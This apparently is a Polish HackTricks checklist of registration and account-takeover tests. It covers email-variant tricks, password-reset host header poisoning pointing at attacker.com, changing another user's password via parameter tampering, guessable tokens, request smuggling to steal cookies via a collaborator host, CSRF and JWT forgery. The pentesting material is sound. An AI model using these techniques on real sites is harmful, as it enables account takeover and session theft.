Registration & Takeover Vulnerabilities
Last updated
Last updated
Ucz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Ucz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)
Spróbuj wygenerować przy użyciu istniejącej nazwy użytkownika
Sprawdź różne warianty e-maila:
wielkie litery
+1@
dodaj kropkę w e-mailu
znaki specjalne w nazwie e-maila (%00, %09, %20)
Dodaj czarne znaki po e-mailu: test@test.com a
victim@gmail.com@attacker.com
victim@attacker.com@gmail.com
Sprawdź, czy możesz ustalić, kiedy nazwa użytkownika została już zarejestrowana w aplikacji.
Tworząc użytkownika, sprawdź politykę haseł (sprawdź, czy możesz używać słabych haseł). W takim przypadku możesz spróbować przeprowadzić atak brute force na dane logowania.
Sprawdź tę stronę , aby dowiedzieć się, jak próbować przejęć kont lub wydobywać informacje za pomocą SQL Injections w formularzach rejestracyjnych.
Po rejestracji spróbuj zmienić e-mail i sprawdź, czy ta zmiana jest poprawnie weryfikowana, czy można ją zmienić na dowolne e-maile.
Sprawdź, czy możesz używać tymczasowych e-maili
Długie hasło (>200) prowadzi do DoS
Sprawdź limity szybkości przy tworzeniu konta
Użyj username@burp_collab.net i przeanalizuj callback
Poproś o reset hasła na swój adres e-mail
Kliknij w link do resetu hasła
Nie zmieniaj hasła
Kliknij na dowolne strony trzecie (np. Facebook, Twitter)
Przechwyć żądanie w proxy Burp Suite
Sprawdź, czy nagłówek referer wycieka token resetu hasła.
Przechwyć żądanie resetu hasła w Burp Suite
Dodaj lub edytuj następujące nagłówki w Burp Suite: Host: attacker.com
, X-Forwarded-Host: attacker.com
Prześlij żądanie z zmodyfikowanym nagłówkiem
http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com
Szukaj URL resetu hasła na podstawie nagłówka host jak: https://attacker.com/reset-password.php?token=TOKEN
Atakujący musi zalogować się na swoje konto i przejść do funkcji Zmień hasło.
Uruchom Burp Suite i przechwyć żądanie.
Wyślij je do zakładki repeater i edytuj parametry: User ID/email
powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})
Token resetowania hasła powinien być losowo generowany i unikalny za każdym razem. Spróbuj ustalić, czy token wygasa, czy zawsze jest taki sam; w niektórych przypadkach algorytm generacji jest słaby i można go odgadnąć. Poniższe zmienne mogą być używane przez algorytm.
Znacznik czasu
UserID
Email użytkownika
Imię i nazwisko
Data urodzenia
Kryptografia
Tylko liczby
Mała sekwencja tokenów (znaki między [A-Z,a-z,0-9])
Ponowne użycie tokenu
Data wygaśnięcia tokenu
Wywołaj żądanie resetowania hasła za pomocą API/UI dla konkretnego adresu e-mail, np.: test@mail.com
Sprawdź odpowiedź serwera i poszukaj resetToken
Następnie użyj tokenu w URL, np. https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]
Zarejestruj się w systemie z nazwą użytkownika identyczną do nazwy użytkownika ofiary, ale z wstawionymi białymi znakami przed i/lub po nazwie użytkownika. np.: "admin "
Poproś o resetowanie hasła za pomocą swojego złośliwego nazwy użytkownika.
Użyj tokenu wysłanego na swój e-mail i zresetuj hasło ofiary.
Zaloguj się na konto ofiary za pomocą nowego hasła.
Platforma CTFd była podatna na ten atak. Zobacz: CVE-2020-7245
Znajdź XSS w aplikacji lub subdomenie, jeśli ciasteczka są ograniczone do domeny nadrzędnej: *.domain.com
Wycieknij aktualne ciasteczko sesji
Uwierzytelnij się jako użytkownik, używając ciasteczka
1. Użyj smuggler do wykrycia typu HTTP Request Smuggling (CL, TE, CL.TE)
powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h
2. Stwórz żądanie, które nadpisze POST / HTTP/1.1
następującymi danymi:
GET http://something.burpcollaborator.net HTTP/1.1 X:
z celem otwarcia przekierowania ofiar do burpcollab i kradzieży ich ciasteczek
3. Ostateczne żądanie może wyglądać następująco
Hackerone raporty wykorzystujące ten błąd * https://hackerone.com/reports/737140 * https://hackerone.com/reports/771666
Stwórz ładunek dla CSRF, np: “formularz HTML z automatycznym przesyłaniem do zmiany hasła”
Wyślij ładunek
JSON Web Token może być używany do uwierzytelniania użytkownika.
Edytuj JWT z innym identyfikatorem użytkownika / adresem e-mail
Sprawdź słabą sygnaturę JWT
Ucz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Ucz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)